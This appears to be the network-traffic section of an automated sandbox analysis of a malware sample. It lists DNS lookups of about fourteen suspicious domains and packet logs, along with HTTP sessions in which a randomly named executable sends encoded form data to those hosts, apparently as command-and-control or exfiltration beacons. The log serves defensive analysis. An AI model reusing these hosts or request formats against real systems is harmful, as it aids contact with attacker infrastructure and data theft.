                                                                      Jan 13, 2025 09:41:34.989156008 CET8050042199.59.243.228192.168.2.4
                                                                      Jan 13, 2025 09:41:34.989177942 CET8050042199.59.243.228192.168.2.4
                                                                      Jan 13, 2025 09:41:34.989191055 CET8050042199.59.243.228192.168.2.4
                                                                      Jan 13, 2025 09:41:34.989234924 CET8050042199.59.243.228192.168.2.4
                                                                      Jan 13, 2025 09:41:34.989247084 CET8050042199.59.243.228192.168.2.4
                                                                      Jan 13, 2025 09:41:34.989336014 CET8050042199.59.243.228192.168.2.4
                                                                      Jan 13, 2025 09:41:34.989382982 CET8050042199.59.243.228192.168.2.4
                                                                      Jan 13, 2025 09:41:34.989409924 CET8050042199.59.243.228192.168.2.4
                                                                      Jan 13, 2025 09:41:35.449476004 CET8050042199.59.243.228192.168.2.4
                                                                      Jan 13, 2025 09:41:35.449515104 CET8050042199.59.243.228192.168.2.4
                                                                      Jan 13, 2025 09:41:35.449551105 CET8050042199.59.243.228192.168.2.4
                                                                      Jan 13, 2025 09:41:35.449592113 CET5004280192.168.2.4199.59.243.228
                                                                      Jan 13, 2025 09:41:35.449651003 CET5004280192.168.2.4199.59.243.228
                                                                      Jan 13, 2025 09:41:36.490154982 CET5004280192.168.2.4199.59.243.228
                                                                      Jan 13, 2025 09:41:37.508800030 CET5004380192.168.2.4199.59.243.228
                                                                      Jan 13, 2025 09:41:37.513878107 CET8050043199.59.243.228192.168.2.4
                                                                      Jan 13, 2025 09:41:37.516575098 CET5004380192.168.2.4199.59.243.228
                                                                      Jan 13, 2025 09:41:37.525835991 CET5004380192.168.2.4199.59.243.228
                                                                      Jan 13, 2025 09:41:37.530721903 CET8050043199.59.243.228192.168.2.4
                                                                      Jan 13, 2025 09:41:37.999268055 CET8050043199.59.243.228192.168.2.4
                                                                      Jan 13, 2025 09:41:37.999295950 CET8050043199.59.243.228192.168.2.4
                                                                      Jan 13, 2025 09:41:37.999324083 CET8050043199.59.243.228192.168.2.4
                                                                      Jan 13, 2025 09:41:37.999454975 CET5004380192.168.2.4199.59.243.228
                                                                      Jan 13, 2025 09:41:38.002497911 CET5004380192.168.2.4199.59.243.228
                                                                      Jan 13, 2025 09:41:38.007328987 CET8050043199.59.243.228192.168.2.4
                                                                      Jan 13, 2025 09:41:43.046436071 CET5004480192.168.2.418.139.62.226
                                                                      Jan 13, 2025 09:41:43.051376104 CET805004418.139.62.226192.168.2.4
                                                                      Jan 13, 2025 09:41:43.051455975 CET5004480192.168.2.418.139.62.226
                                                                      Jan 13, 2025 09:41:43.066718102 CET5004480192.168.2.418.139.62.226
                                                                      Jan 13, 2025 09:41:43.071582079 CET805004418.139.62.226192.168.2.4
                                                                      Jan 13, 2025 09:41:43.993182898 CET805004418.139.62.226192.168.2.4
                                                                      Jan 13, 2025 09:41:43.993247986 CET805004418.139.62.226192.168.2.4
                                                                      Jan 13, 2025 09:41:43.993299007 CET5004480192.168.2.418.139.62.226
                                                                      Jan 13, 2025 09:41:44.571096897 CET5004480192.168.2.418.139.62.226
                                                                      Jan 13, 2025 09:41:45.588167906 CET5004580192.168.2.418.139.62.226
                                                                      Jan 13, 2025 09:41:45.593498945 CET805004518.139.62.226192.168.2.4
                                                                      Jan 13, 2025 09:41:45.593580961 CET5004580192.168.2.418.139.62.226
                                                                      Jan 13, 2025 09:41:45.610457897 CET5004580192.168.2.418.139.62.226
                                                                      Jan 13, 2025 09:41:45.615432024 CET805004518.139.62.226192.168.2.4
                                                                      Jan 13, 2025 09:41:46.561048031 CET805004518.139.62.226192.168.2.4
                                                                      Jan 13, 2025 09:41:46.561137915 CET805004518.139.62.226192.168.2.4
                                                                      Jan 13, 2025 09:41:46.568284035 CET5004580192.168.2.418.139.62.226
                                                                      Jan 13, 2025 09:41:47.115139961 CET5004580192.168.2.418.139.62.226
                                                                      Jan 13, 2025 09:41:48.134742975 CET5004680192.168.2.418.139.62.226
                                                                      Jan 13, 2025 09:41:48.139806986 CET805004618.139.62.226192.168.2.4
                                                                      Jan 13, 2025 09:41:48.139883995 CET5004680192.168.2.418.139.62.226
                                                                      Jan 13, 2025 09:41:48.165729046 CET5004680192.168.2.418.139.62.226
                                                                      Jan 13, 2025 09:41:48.170702934 CET805004618.139.62.226192.168.2.4
                                                                      Jan 13, 2025 09:41:48.170722961 CET805004618.139.62.226192.168.2.4
                                                                      Jan 13, 2025 09:41:48.170747042 CET805004618.139.62.226192.168.2.4
                                                                      Jan 13, 2025 09:41:48.170758963 CET805004618.139.62.226192.168.2.4
                                                                      Jan 13, 2025 09:41:48.170769930 CET805004618.139.62.226192.168.2.4
                                                                      Jan 13, 2025 09:41:48.170969963 CET805004618.139.62.226192.168.2.4
                                                                      Jan 13, 2025 09:41:48.170980930 CET805004618.139.62.226192.168.2.4
                                                                      Jan 13, 2025 09:41:48.171026945 CET805004618.139.62.226192.168.2.4
                                                                      Jan 13, 2025 09:41:48.171039104 CET805004618.139.62.226192.168.2.4
                                                                      Jan 13, 2025 09:41:49.084079981 CET805004618.139.62.226192.168.2.4
                                                                      Jan 13, 2025 09:41:49.089608908 CET805004618.139.62.226192.168.2.4
                                                                      Jan 13, 2025 09:41:49.092505932 CET5004680192.168.2.418.139.62.226
                                                                      Jan 13, 2025 09:41:49.677793980 CET5004680192.168.2.418.139.62.226
                                                                      Jan 13, 2025 09:41:50.696480989 CET5004780192.168.2.418.139.62.226
                                                                      Jan 13, 2025 09:41:50.701390982 CET805004718.139.62.226192.168.2.4
                                                                      Jan 13, 2025 09:41:50.702641010 CET5004780192.168.2.418.139.62.226
                                                                      Jan 13, 2025 09:41:50.714548111 CET5004780192.168.2.418.139.62.226
                                                                      Jan 13, 2025 09:41:50.719698906 CET805004718.139.62.226192.168.2.4
                                                                      Jan 13, 2025 09:41:51.670768976 CET805004718.139.62.226192.168.2.4
                                                                      Jan 13, 2025 09:41:51.673918009 CET805004718.139.62.226192.168.2.4
                                                                      Jan 13, 2025 09:41:51.674006939 CET5004780192.168.2.418.139.62.226
                                                                      Jan 13, 2025 09:41:51.674835920 CET5004780192.168.2.418.139.62.226
                                                                      Jan 13, 2025 09:41:51.679702044 CET805004718.139.62.226192.168.2.4
                                                                      Jan 13, 2025 09:41:57.182754040 CET5004880192.168.2.4154.39.239.237
                                                                      Jan 13, 2025 09:41:57.187783003 CET8050048154.39.239.237192.168.2.4
                                                                      Jan 13, 2025 09:41:57.187968016 CET5004880192.168.2.4154.39.239.237
                                                                      Jan 13, 2025 09:41:57.202934027 CET5004880192.168.2.4154.39.239.237
                                                                      Jan 13, 2025 09:41:57.207798958 CET8050048154.39.239.237192.168.2.4
                                                                      Jan 13, 2025 09:41:58.708880901 CET5004880192.168.2.4154.39.239.237
                                                                      Jan 13, 2025 09:41:58.843976974 CET8050048154.39.239.237192.168.2.4
                                                                      Jan 13, 2025 09:41:59.727998018 CET5004980192.168.2.4154.39.239.237
                                                                      Jan 13, 2025 09:41:59.733103991 CET8050049154.39.239.237192.168.2.4
                                                                      Jan 13, 2025 09:41:59.733166933 CET5004980192.168.2.4154.39.239.237
                                                                      Jan 13, 2025 09:41:59.749032974 CET5004980192.168.2.4154.39.239.237
                                                                      Jan 13, 2025 09:41:59.753937960 CET8050049154.39.239.237192.168.2.4
                                                                      Jan 13, 2025 09:42:01.257989883 CET5004980192.168.2.4154.39.239.237
                                                                      Jan 13, 2025 09:42:01.303992033 CET8050049154.39.239.237192.168.2.4
                                                                      Jan 13, 2025 09:42:02.286377907 CET5005080192.168.2.4154.39.239.237
                                                                      Jan 13, 2025 09:42:02.292439938 CET8050050154.39.239.237192.168.2.4
                                                                      Jan 13, 2025 09:42:02.292525053 CET5005080192.168.2.4154.39.239.237
                                                                      Jan 13, 2025 09:42:02.311662912 CET5005080192.168.2.4154.39.239.237
                                                                      Jan 13, 2025 09:42:02.318912029 CET8050050154.39.239.237192.168.2.4
                                                                      Jan 13, 2025 09:42:02.318944931 CET8050050154.39.239.237192.168.2.4
                                                                      Jan 13, 2025 09:42:02.318974018 CET8050050154.39.239.237192.168.2.4
                                                                      Jan 13, 2025 09:42:02.319021940 CET8050050154.39.239.237192.168.2.4
                                                                      Jan 13, 2025 09:42:02.319048882 CET8050050154.39.239.237192.168.2.4
                                                                      Jan 13, 2025 09:42:02.319098949 CET8050050154.39.239.237192.168.2.4
                                                                      Jan 13, 2025 09:42:02.319125891 CET8050050154.39.239.237192.168.2.4
                                                                      Jan 13, 2025 09:42:02.319154024 CET8050050154.39.239.237192.168.2.4
                                                                      Jan 13, 2025 09:42:02.319180012 CET8050050154.39.239.237192.168.2.4
                                                                      Jan 13, 2025 09:42:03.818465948 CET5005080192.168.2.4154.39.239.237
                                                                      Jan 13, 2025 09:42:03.867980957 CET8050050154.39.239.237192.168.2.4
                                                                      Jan 13, 2025 09:42:04.837250948 CET5005180192.168.2.4154.39.239.237
                                                                      Jan 13, 2025 09:42:04.842102051 CET8050051154.39.239.237192.168.2.4
                                                                      Jan 13, 2025 09:42:04.844698906 CET5005180192.168.2.4154.39.239.237
                                                                      Jan 13, 2025 09:42:04.856554031 CET5005180192.168.2.4154.39.239.237
                                                                      Jan 13, 2025 09:42:04.861391068 CET8050051154.39.239.237192.168.2.4
                                                                      Jan 13, 2025 09:42:18.573012114 CET8050048154.39.239.237192.168.2.4
                                                                      Jan 13, 2025 09:42:18.573070049 CET5004880192.168.2.4154.39.239.237
                                                                      Jan 13, 2025 09:42:21.120630026 CET8050049154.39.239.237192.168.2.4
                                                                      Jan 13, 2025 09:42:21.124475002 CET5004980192.168.2.4154.39.239.237
                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Jan 13, 2025 09:39:01.636439085 CET5601753192.168.2.41.1.1.1
                                                                      Jan 13, 2025 09:39:01.652561903 CET53560171.1.1.1192.168.2.4
                                                                      Jan 13, 2025 09:39:18.323514938 CET5383253192.168.2.41.1.1.1
                                                                      Jan 13, 2025 09:39:18.372844934 CET53538321.1.1.1192.168.2.4
                                                                      Jan 13, 2025 09:39:31.542058945 CET6230553192.168.2.41.1.1.1
                                                                      Jan 13, 2025 09:39:31.555604935 CET53623051.1.1.1192.168.2.4
                                                                      Jan 13, 2025 09:39:45.009767056 CET6542353192.168.2.41.1.1.1
                                                                      Jan 13, 2025 09:39:45.269078970 CET53654231.1.1.1192.168.2.4
                                                                      Jan 13, 2025 09:39:58.838020086 CET5159853192.168.2.41.1.1.1
                                                                      Jan 13, 2025 09:39:59.719882011 CET53515981.1.1.1192.168.2.4
                                                                      Jan 13, 2025 09:40:13.184659004 CET5008953192.168.2.41.1.1.1
                                                                      Jan 13, 2025 09:40:13.527256012 CET53500891.1.1.1192.168.2.4
                                                                      Jan 13, 2025 09:40:26.853971004 CET6440153192.168.2.41.1.1.1
                                                                      Jan 13, 2025 09:40:26.903321028 CET53644011.1.1.1192.168.2.4
                                                                      Jan 13, 2025 09:40:40.107377052 CET5889153192.168.2.41.1.1.1
                                                                      Jan 13, 2025 09:40:40.612215042 CET53588911.1.1.1192.168.2.4
                                                                      Jan 13, 2025 09:40:54.181632996 CET5611653192.168.2.41.1.1.1
                                                                      Jan 13, 2025 09:40:54.205379009 CET53561161.1.1.1192.168.2.4
                                                                      Jan 13, 2025 09:41:08.496536016 CET5194753192.168.2.41.1.1.1
                                                                      Jan 13, 2025 09:41:08.514060020 CET53519471.1.1.1192.168.2.4
                                                                      Jan 13, 2025 09:41:21.728710890 CET5646853192.168.2.41.1.1.1
                                                                      Jan 13, 2025 09:41:21.738488913 CET53564681.1.1.1192.168.2.4
                                                                      Jan 13, 2025 09:41:29.791436911 CET6354353192.168.2.41.1.1.1
                                                                      Jan 13, 2025 09:41:29.856998920 CET53635431.1.1.1192.168.2.4
                                                                      Jan 13, 2025 09:41:43.012391090 CET5443753192.168.2.41.1.1.1
                                                                      Jan 13, 2025 09:41:43.044127941 CET53544371.1.1.1192.168.2.4
                                                                      Jan 13, 2025 09:41:56.684463978 CET5757853192.168.2.41.1.1.1
                                                                      Jan 13, 2025 09:41:57.177670002 CET53575781.1.1.1192.168.2.4
                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                      Jan 13, 2025 09:39:01.636439085 CET192.168.2.41.1.1.10x951aStandard query (0)www.gayhxi.infoA (IP address)IN (0x0001)false
                                                                      Jan 13, 2025 09:39:18.323514938 CET192.168.2.41.1.1.10xe3d6Standard query (0)www.promocao.infoA (IP address)IN (0x0001)false
                                                                      Jan 13, 2025 09:39:31.542058945 CET192.168.2.41.1.1.10x70acStandard query (0)www.grimbo.boatsA (IP address)IN (0x0001)false
                                                                      Jan 13, 2025 09:39:45.009767056 CET192.168.2.41.1.1.10x1b99Standard query (0)www.44756.pizzaA (IP address)IN (0x0001)false
                                                                      Jan 13, 2025 09:39:58.838020086 CET192.168.2.41.1.1.10x4b8fStandard query (0)www.lonfor.websiteA (IP address)IN (0x0001)false
                                                                      Jan 13, 2025 09:40:13.184659004 CET192.168.2.41.1.1.10x6170Standard query (0)www.investshares.netA (IP address)IN (0x0001)false
                                                                      Jan 13, 2025 09:40:26.853971004 CET192.168.2.41.1.1.10x30ecStandard query (0)www.nosolofichas.onlineA (IP address)IN (0x0001)false
                                                                      Jan 13, 2025 09:40:40.107377052 CET192.168.2.41.1.1.10x9951Standard query (0)www.jrcov55qgcxp5fwa.topA (IP address)IN (0x0001)false
                                                                      Jan 13, 2025 09:40:54.181632996 CET192.168.2.41.1.1.10x1b0bStandard query (0)www.adadev.infoA (IP address)IN (0x0001)false
                                                                      Jan 13, 2025 09:41:08.496536016 CET192.168.2.41.1.1.10xca73Standard query (0)www.cifasnc.infoA (IP address)IN (0x0001)false
                                                                      Jan 13, 2025 09:41:21.728710890 CET192.168.2.41.1.1.10xc15dStandard query (0)www.ebsmadrid.storeA (IP address)IN (0x0001)false
                                                                      Jan 13, 2025 09:41:29.791436911 CET192.168.2.41.1.1.10xf01aStandard query (0)www.denture-prices.clickA (IP address)IN (0x0001)false
                                                                      Jan 13, 2025 09:41:43.012391090 CET192.168.2.41.1.1.10x8290Standard query (0)www.sonixingenuine.shopA (IP address)IN (0x0001)false
                                                                      Jan 13, 2025 09:41:56.684463978 CET192.168.2.41.1.1.10x6efcStandard query (0)www.moyu19.proA (IP address)IN (0x0001)false
                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                      Jan 13, 2025 09:39:01.652561903 CET1.1.1.1192.168.2.40x951aNo error (0)www.gayhxi.info47.83.1.90A (IP address)IN (0x0001)false
                                                                      Jan 13, 2025 09:39:18.372844934 CET1.1.1.1192.168.2.40xe3d6No error (0)www.promocao.infopromocao.infoCNAME (Canonical name)IN (0x0001)false
                                                                      Jan 13, 2025 09:39:18.372844934 CET1.1.1.1192.168.2.40xe3d6No error (0)promocao.info84.32.84.32A (IP address)IN (0x0001)false
                                                                      Jan 13, 2025 09:39:31.555604935 CET1.1.1.1192.168.2.40x70acNo error (0)www.grimbo.boats172.67.182.198A (IP address)IN (0x0001)false
                                                                      Jan 13, 2025 09:39:31.555604935 CET1.1.1.1192.168.2.40x70acNo error (0)www.grimbo.boats104.21.18.171A (IP address)IN (0x0001)false
                                                                      Jan 13, 2025 09:39:45.269078970 CET1.1.1.1192.168.2.40x1b99No error (0)www.44756.pizzazcdn.8383dns.comCNAME (Canonical name)IN (0x0001)false
                                                                      Jan 13, 2025 09:39:45.269078970 CET1.1.1.1192.168.2.40x1b99No error (0)zcdn.8383dns.com134.122.135.48A (IP address)IN (0x0001)false
                                                                      Jan 13, 2025 09:39:45.269078970 CET1.1.1.1192.168.2.40x1b99No error (0)zcdn.8383dns.com134.122.133.80A (IP address)IN (0x0001)false
                                                                      Jan 13, 2025 09:39:59.719882011 CET1.1.1.1192.168.2.40x4b8fNo error (0)www.lonfor.website199.192.21.169A (IP address)IN (0x0001)false
                                                                      Jan 13, 2025 09:40:13.527256012 CET1.1.1.1192.168.2.40x6170No error (0)www.investshares.net154.197.162.239A (IP address)IN (0x0001)false
                                                                      Jan 13, 2025 09:40:26.903321028 CET1.1.1.1192.168.2.40x30ecNo error (0)www.nosolofichas.onlinenosolofichas.onlineCNAME (Canonical name)IN (0x0001)false
                                                                      Jan 13, 2025 09:40:26.903321028 CET1.1.1.1192.168.2.40x30ecNo error (0)nosolofichas.online84.32.84.32A (IP address)IN (0x0001)false
                                                                      Jan 13, 2025 09:40:40.612215042 CET1.1.1.1192.168.2.40x9951No error (0)www.jrcov55qgcxp5fwa.topzcdn.8383dns.comCNAME (Canonical name)IN (0x0001)false
                                                                      Jan 13, 2025 09:40:40.612215042 CET1.1.1.1192.168.2.40x9951No error (0)zcdn.8383dns.com134.122.135.48A (IP address)IN (0x0001)false
                                                                      Jan 13, 2025 09:40:40.612215042 CET1.1.1.1192.168.2.40x9951No error (0)zcdn.8383dns.com134.122.133.80A (IP address)IN (0x0001)false
                                                                      Jan 13, 2025 09:40:54.205379009 CET1.1.1.1192.168.2.40x1b0bNo error (0)www.adadev.info47.83.1.90A (IP address)IN (0x0001)false
                                                                      Jan 13, 2025 09:41:08.514060020 CET1.1.1.1192.168.2.40xca73No error (0)www.cifasnc.info188.114.96.3A (IP address)IN (0x0001)false
                                                                      Jan 13, 2025 09:41:08.514060020 CET1.1.1.1192.168.2.40xca73No error (0)www.cifasnc.info188.114.97.3A (IP address)IN (0x0001)false
                                                                      Jan 13, 2025 09:41:21.738488913 CET1.1.1.1192.168.2.40xc15dName error (3)www.ebsmadrid.storenonenoneA (IP address)IN (0x0001)false
                                                                      Jan 13, 2025 09:41:29.856998920 CET1.1.1.1192.168.2.40xf01aNo error (0)www.denture-prices.click199.59.243.228A (IP address)IN (0x0001)false
                                                                      Jan 13, 2025 09:41:43.044127941 CET1.1.1.1192.168.2.40x8290No error (0)www.sonixingenuine.shopdns.ladipage.comCNAME (Canonical name)IN (0x0001)false
                                                                      Jan 13, 2025 09:41:43.044127941 CET1.1.1.1192.168.2.40x8290No error (0)dns.ladipage.com18.139.62.226A (IP address)IN (0x0001)false
                                                                      Jan 13, 2025 09:41:43.044127941 CET1.1.1.1192.168.2.40x8290No error (0)dns.ladipage.com13.228.81.39A (IP address)IN (0x0001)false
                                                                      Jan 13, 2025 09:41:57.177670002 CET1.1.1.1192.168.2.40x6efcNo error (0)www.moyu19.pro154.39.239.237A (IP address)IN (0x0001)false
                                                                      • www.gayhxi.info
                                                                      • www.promocao.info
                                                                      • www.grimbo.boats
                                                                      • www.44756.pizza
                                                                      • www.lonfor.website
                                                                      • www.investshares.net
                                                                      • www.nosolofichas.online
                                                                      • www.jrcov55qgcxp5fwa.top
                                                                      • www.adadev.info
                                                                      • www.cifasnc.info
                                                                      • www.denture-prices.click
                                                                      • www.sonixingenuine.shop
                                                                      • www.moyu19.pro
                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      0192.168.2.44977847.83.1.90805816C:\Program Files (x86)\EvhjnfbNLvgcBIQOCXgUqJUraLVxHRyNYTRVwYxdssmFxbmUktNntHZKuhRQLTjjMcZJKgerMgkgIDU\gGZaaTbTIZmmI.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 13, 2025 09:39:01.758270979 CET465OUTGET /k2i2/?88v07=oYl0YuhK+EfenM8eRya5NBLYEg3QT0lWSGf6Q1012MfAC24gU0JLDS7JdRiR078xrhufJIQsd6i55/X9+LeTYH71Qo8BiJAJadzAW0K4pL4P2w4s2MVD1OU=&O2=aP0Tt HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Host: www.gayhxi.info
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Jan 13, 2025 09:39:03.273442030 CET139INHTTP/1.1 567 unknown
                                                                      Server: nginx/1.18.0
                                                                      Date: Mon, 13 Jan 2025 08:39:03 GMT
                                                                      Content-Length: 17
                                                                      Connection: close
                                                                      Data Raw: 52 65 71 75 65 73 74 20 74 6f 6f 20 6c 61 72 67 65
                                                                      Data Ascii: Request too large


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      1192.168.2.44988984.32.84.32805816C:\Program Files (x86)\EvhjnfbNLvgcBIQOCXgUqJUraLVxHRyNYTRVwYxdssmFxbmUktNntHZKuhRQLTjjMcZJKgerMgkgIDU\gGZaaTbTIZmmI.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 13, 2025 09:39:18.403067112 CET737OUTPOST /zaz4/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Host: www.promocao.info
                                                                      Origin: http://www.promocao.info
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 202
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.promocao.info/zaz4/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Data Raw: 38 38 76 30 37 3d 58 39 76 6e 31 62 32 5a 30 41 74 43 54 57 56 4c 74 5a 37 6c 74 33 63 57 66 4c 59 46 49 54 65 6c 44 6d 49 4e 59 51 44 4d 50 47 49 70 69 6b 71 30 47 56 72 77 37 78 31 67 31 67 4e 73 78 48 4b 56 59 57 4e 35 30 78 78 7a 31 33 63 66 2f 69 56 6a 69 44 31 75 74 42 6b 50 6b 6d 49 45 2b 71 53 43 34 64 51 30 76 54 73 32 4b 43 61 46 4a 75 6d 62 63 74 4c 62 31 47 55 4c 30 7a 64 45 33 73 44 6a 64 34 78 78 4a 2f 58 59 75 69 41 54 69 49 30 4a 62 78 78 57 64 5a 51 72 51 56 43 54 41 44 63 7a 76 4f 6e 42 37 69 32 52 56 63 4b 2b 58 71 6c 39 6e 53 38 6a 7a 43 5a 61 50 4a 31 42 51 48 56 63 7a 67 3d 3d
                                                                      Data Ascii: 88v07=X9vn1b2Z0AtCTWVLtZ7lt3cWfLYFITelDmINYQDMPGIpikq0GVrw7x1g1gNsxHKVYWN50xxz13cf/iVjiD1utBkPkmIE+qSC4dQ0vTs2KCaFJumbctLb1GUL0zdE3sDjd4xxJ/XYuiATiI0JbxxWdZQrQVCTADczvOnB7i2RVcK+Xql9nS8jzCZaPJ1BQHVczg==


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      2192.168.2.44990584.32.84.32805816C:\Program Files (x86)\EvhjnfbNLvgcBIQOCXgUqJUraLVxHRyNYTRVwYxdssmFxbmUktNntHZKuhRQLTjjMcZJKgerMgkgIDU\gGZaaTbTIZmmI.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 13, 2025 09:39:20.966485023 CET757OUTPOST /zaz4/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Host: www.promocao.info
                                                                      Origin: http://www.promocao.info
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 222
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.promocao.info/zaz4/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Data Raw: 38 38 76 30 37 3d 58 39 76 6e 31 62 32 5a 30 41 74 43 54 33 46 4c 2b 4b 54 6c 6b 33 63 56 42 62 59 46 65 6a 65 68 44 6d 45 4e 59 53 76 63 50 31 73 70 68 48 2b 30 48 55 72 77 2b 78 31 67 2b 41 4e 70 2f 6e 4b 6b 59 57 78 78 30 77 4e 7a 31 30 67 66 2f 6e 70 6a 69 30 70 74 74 52 6b 4e 70 47 49 61 78 4b 53 43 34 64 51 30 76 54 51 63 4b 42 71 46 4b 65 57 62 64 49 2f 63 32 47 55 49 7a 7a 64 45 7a 73 43 71 64 34 78 50 4a 39 76 69 75 67 34 54 69 4b 73 4a 62 67 78 52 4b 70 51 70 4f 6c 44 57 45 42 46 4c 6d 2b 69 49 32 42 53 2f 64 39 75 42 57 73 6f 6e 32 6a 64 30 68 43 39 70 53 4f 38 31 64 45 6f 56 6f 69 38 36 63 46 62 6e 75 5a 41 73 48 6b 6e 6e 70 35 31 44 5a 49 55 3d
                                                                      Data Ascii: 88v07=X9vn1b2Z0AtCT3FL+KTlk3cVBbYFejehDmENYSvcP1sphH+0HUrw+x1g+ANp/nKkYWxx0wNz10gf/npji0pttRkNpGIaxKSC4dQ0vTQcKBqFKeWbdI/c2GUIzzdEzsCqd4xPJ9viug4TiKsJbgxRKpQpOlDWEBFLm+iI2BS/d9uBWson2jd0hC9pSO81dEoVoi86cFbnuZAsHknnp51DZIU=


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      3192.168.2.44992184.32.84.32805816C:\Program Files (x86)\EvhjnfbNLvgcBIQOCXgUqJUraLVxHRyNYTRVwYxdssmFxbmUktNntHZKuhRQLTjjMcZJKgerMgkgIDU\gGZaaTbTIZmmI.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 13, 2025 09:39:23.518078089 CET10839OUTPOST /zaz4/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Host: www.promocao.info
                                                                      Origin: http://www.promocao.info
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 10302
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.promocao.info/zaz4/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Data Raw: 38 38 76 30 37 3d 58 39 76 6e 31 62 32 5a 30 41 74 43 54 33 46 4c 2b 4b 54 6c 6b 33 63 56 42 62 59 46 65 6a 65 68 44 6d 45 4e 59 53 76 63 50 31 6b 70 68 31 6d 30 47 33 44 77 35 78 31 67 7a 67 4e 6f 2f 6e 4b 39 59 57 5a 31 30 77 42 4a 31 79 73 66 2f 46 52 6a 31 52 64 74 6e 52 6b 4e 31 32 49 62 2b 71 54 41 34 64 68 7a 76 53 38 63 4b 42 71 46 4b 63 2b 62 4c 74 4c 63 77 47 55 4c 30 7a 64 59 33 73 43 43 64 35 5a 41 4a 39 72 49 75 51 59 54 69 70 55 4a 5a 57 6c 52 49 4a 51 76 50 6c 44 77 45 42 35 55 6d 2b 2b 75 32 41 32 56 64 2b 79 42 55 59 70 59 74 7a 46 44 7a 44 70 59 4f 76 4d 64 53 57 41 7a 77 68 77 50 62 58 2f 6d 36 35 51 69 46 6e 43 52 30 62 31 36 46 4e 69 4d 55 6b 36 5a 39 71 39 36 59 54 32 5a 49 6d 55 68 51 61 47 4f 33 6e 69 55 6b 30 6b 76 52 6e 6a 51 5a 76 70 36 68 4d 69 39 7a 4c 50 30 7a 48 66 55 6d 6e 62 70 49 5a 46 77 70 6b 73 53 34 57 36 62 54 37 2b 57 33 30 34 51 52 71 78 58 32 50 67 33 37 38 55 4d 38 6c 68 7a 6b 77 69 37 58 57 46 64 5a 35 70 70 61 31 56 61 2f 47 71 56 71 5a 64 6c 54 79 44 4e [TRUNCATED]
